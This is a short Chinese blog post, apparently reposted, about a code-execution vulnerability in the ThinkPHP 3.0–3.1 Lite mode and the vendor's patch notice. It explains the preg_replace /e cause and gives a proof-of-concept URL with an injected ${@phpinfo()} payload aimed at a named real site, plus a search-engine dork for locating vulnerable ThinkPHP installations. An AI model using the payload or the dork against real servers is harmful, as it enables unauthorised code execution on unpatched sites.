Thinkphp 3.0-3.1版代码执行漏洞
近日360库带计划中播报的ThinkPHP扩展类库的漏洞已经查明原因:系官方扩展模式中的Lite精简模式中存在可能的漏洞(原先核心更新安全的时候 并没有更新模式扩展部分,现已更新)。
对于使用标准模式或者其他模式的用户不存在此漏洞,敬请放心。3.2版本已经对扩展重新设计(原来的模式扩展、引擎扩展均不再支持),也不存在此问题。
请有使用ThinkPHP3.0~3.1版本的Lite模式的用户注意更新。
Lite模式扩展包下载地址:http://www.thinkphp.cn/extend/219.html
360库带计划:http://loudong.360.cn/vul/info/id/2919
ThinkPHP 开启lite模式后,会加载ThinkPHP/Extend/Mode/Lite/Dispacher.class.php去匹配URL并分发用户请求, 而在该文件的65行使用perg_replace函数的 /e参数,
第二个参数引用的时候使用了双引号,从而导致代码执行。
测试:http://www.rru-gz.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D
Google语法:
inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework } 禁止用在非法用途
[via@0day5]
本文发于:安全大可文章转载请注明出处:http://im404.cnblogs.com
相关事宜请联系:im404@qq.com